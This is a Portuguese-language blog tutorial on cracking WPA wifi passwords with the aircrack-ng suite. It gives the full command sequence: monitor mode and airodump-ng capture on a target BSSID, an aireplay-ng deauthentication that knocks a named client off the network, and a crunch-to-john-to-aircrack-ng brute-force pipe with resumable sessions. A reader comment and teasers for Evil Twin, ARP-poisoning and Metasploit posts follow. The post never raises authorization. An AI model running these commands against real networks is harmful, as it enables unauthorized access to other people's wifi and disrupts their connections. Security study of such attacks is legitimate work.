Capturando pacotes wifi - AirCrack e Utilizar Wordlist Gigantes sem ocupar espaço e salvando o progresso

Por

Airodump-ng
O airodump-ng, faz parte do aircrack-ng e permite capturar todos os pacotes no alcance do cartão de Wifi, também pode ser utilizado para escanear todas as redes Wifi no alcance e obter informação deles.



Para usar deve-se fazer o comando

Habilitar o modo monitor
> airmon-ng start wlan0
Iniciar o airodump-ng
> airodump-ng mon0


BSSID = MAC Address
PWR = Power, Demonstra a distância que este Wifi está. Quanto menor mais próximo e mais fácil de capturar pacotes.
ESSID = O nome do Wifi
Beacons = Sinais que o AP envia, cada um envia pacotes para se comunicar a todos os dispositivos
Data = O número de pacotes úteis que podemos receber
#/S = os pacotes coletados nos últimos 10 segundos
CH = Channel o canal que está esse Access Point
MB = A velocidade máxima que esse AP alcanca
ENC = Encryption WPA ou WPA2 etc…
CIPHER = Cifra utilizada para descriptografar
AUTH = Autorização

Podemos utilizar o airodump-ng em um alvo específico e gravar toda a informação em um arquivo e depois analisar com wireshark, porém se o pacote estiver criptografado não terá muita utilidade.

Fazemos isso com o comando

airodump-ng --channel[channel] --bssid[bssid] --write[nome do arquivo] [interface]

Por exemplo:
Vamos fazer com essa que está selecionada

> airodump-ng --channel 2 --bssid 00:10:18:90:2D:EE --write test-upc mon0


Agora só temos informação do Access Point que nos interessa.
A primeira sessão, de cim, nos mostra todos os dados desse AP

A Segunda sessão, de Baixo nos mostra todos os clientes associados a esse AP
STATION = O MAC Address do cliente conectado

Os arquivos foram gravados no Linux e podem ser analisados com Wireshark. Porém eles estão criptografados, veremos depois como podemos descriptografá-los em outro post.

Ganhando acesso ao Handshake

Capturar os pacotes de um cartão específico, vamos com a rede chamada test-ap

> airodump-ng --channel 11 --bssid 00:10:18:90:2D:EE --write test-handshake mon0


Agora precisamos capturar o Handshake que acontece toda vez que um novo dispositivo se conecta com alguma rede. Por isso precisamos derrubar essa rede por um pequeno tempo e acessar ela, faremos isso com o método de deautenticação.


Precisamos desligar esse dispositivo da rede.

aireplay-ng --deauth 4 -a [MAC do AP] -c [MAC do alvo STATION] [Interface]
> aireplay-ng --deauth 4 -a :00:10:18:90:2D:EE -c C0:18:85:C1:CF:01 mon0


Podemos ver lá em cima que foi capturado o handshake e o alvo não recebeu nenhuma notícia de desconexão pois foi por um período muito curto.

Usando uma Wordlist gigante sem ocupar espaço

Vamos usar uma ferramenta para criar Wordlist chamada crunch porém não iremos salvar essa wordlist no computador, iremos enviar o output dela para o aircrack-ng e iremos salvar o progresso com uma ferramenta chamada John

> crunch 8 8 | john --stdin --session=session1 --stdout | aircrack-ng -b [bssi do alvo] -w -handshake-01.cap


Para parar e retornar o john fazemos o comando

> Crunch 8 8 | john --restore=session1 | aircrack-ng -b [bssi do alvo] -w -handshake-01.cap



Comentários

  1. Marcelo Moura8 de abril de 2020 às 12:47

    se vc ainda estiver vivo será que poderia me responder?
    nessa linha aqui:
    crunch 8 8 | john --stdin --session=session1 --stdout | aircrack-ng -b [bssi do alvo] -w -handshake-01.cap

    o handshake-01.cap é o handshake capturado anteriormente com o airodump né?

    ResponderExcluir

Postar um comentário

Mais visitadas

Usando GPU para Brute-Force com HashCat

Por
Imagem
Há uma diferença entre CPU e GPU, e o primeiro passo é explicá-los de formas separadas. Sem mais delongas, vamos lá! CPU (unidade central de processamento) é o processador do computador. Você o encontra dentro do gabinete ou do seu smartphone. Suas funções são de modo mais geral, influenciam em basicamente todos os recursos do computador ou smartphone, desde o processamento de dados, a memória (cachê) e os cálculos dos seus eletrônicos. Em uma explicação mais simples e rápida, a CPU é o cérebro do seu computador. GPU (unidade de processamento gráfico) também conhecido como VPU (unidade de processamento visual) é o processador da sua placa de vídeo. Apesar das novas tecnologias permitirem que as GPUs façam mais do que processar somente a placa de vídeo, sua principal função ainda continua sendo esta. São responsáveis pelos gráficos dos seus aparelhos eletrônicos.
Leia mais

Ataque Evil Twin

Por
Imagem
Evil Twin (também conhecido como “gêmeo malvado”) é um tipo de ataque Wi-Fi, semelhante a spoofing de site e ataques de phishing por e-mail. Esta técnica (que não é nova), é basicamente uma versão wireless dos ataques phising scam: usuários pensam que se conectaram a um hotspot legítimo, mas na realidade, estão se conectando a um servidor malicioso que pode monitorar e obter dados digitados pelo usuário. Em outras palavras, cyber atacantes podem obter todas as informações sem o conhecimento do usuário. Evil Twin parece um Hotspot, mas com um forte sinal.
Leia mais

XSS - Cross-site scripting

Por
Imagem
Eu traduzi esse artigo do google e acrescentei alguns outros detalhes.  Veja o original aqui https://www.google.com/about/appsecurity/learning/xss/index.html Após ler esse artigo vale a pena jogar o jogo do google sobre XXS https://xss-game.appspot.com/ Introdução ao cross-site scripting Público-alvo Este documento destina-se a qualquer pessoa que desenvolva websites ou tenha interesse em tópicos de segurança da Web. Um plano de fundo em HTML, JavaScript e Document Object Model (DOM) seria útil para alguns dos detalhes mais técnicos.
Leia mais

Man-in-the-Middle e MITMf - DNS Spoofing e suas defesas

Por
Imagem
Neste tutorial iremos abordar o tipo de ataque conhecido como Man in the Middle. Esse teste "envenena" a Tabela ARP da vitima, fazendo com que a máquina atacante, nossa, se passe pelo roteador, fazendo com que consigamos interceptar o tráfego e ter acesso a dados sigilosos trocados entre os dois atores. A exploração do ARP Poisoning é o método mais rápido de se estabelecer no meio da comunicação entre duas máquinas e interceptar as informações enviadas entre ambas, fazendo com que possua acesso a dados confidenciais, senhas e relatórios de tráfego. Esse método se aplica somente em redes Ethernet ou seja, esse tipo de comunicação pode ser resumido em redes internas, sejam elas empresariais, residenciais ou até mesmo aquele wifi livre na praça de alimentação do Shopping ou do café que você gosta de frequentar.
Leia mais

Mitmproxy 1 - Conhecendo

Por
Imagem
Neste artigo pretendo mostrar o funcionamento básico do mitmproxy, em breve farei outro artigo demonstrando como podemos usar essa ferramenta para ataques poderosos escrevendo nossos próprios scripts. Mitmproxy é um proxy compatível com SSL que funciona como man-in-the-middle para comunicação HTTP e HTTPS. É uma ferramenta interativa muito boa que permite monitorar, modificar e reproduzir o tráfego HTTP / HTTPS que passa por ele. Para poder espionar e modificar a comunicação HTTPS, o mitmproxy pretende ser o servidor para o cliente e o cliente para o servidor, enquanto está posicionado no meio, decodifica o tráfego de ambos. Mitmproxy gera certificados on-the-fly para enganar o cliente em acreditar que estão se comunicando com o servidor. mitmproxy se difere do mitmf que faz todo o trabalho hoje pesado por nós, mas só permite injetar codigos html ou javascript nas páginas em que o alvo entra, porém se quisermos enviar um .exe ou download? com o mitmproxy poderemos manualm
Leia mais

Ataque pelo servidor - Metasploit - Nexpose

Por
Imagem
Conseguindo acesso ao alvo - Server Side Há duas formas de conseguir acesso há uma máquina alheia: Server side Não precisa de nenhuma interação da vítima, tudo o que precisamos é o IP dela. Client Server Precisa de alguma interação da vítima como abrir algum arquivo Com certeza a melhor forma é utilizar a primeira opção primeiro, se não conseguir tentar a segunda. Vamos falar um pouco agora sobre a primeira opção.
Leia mais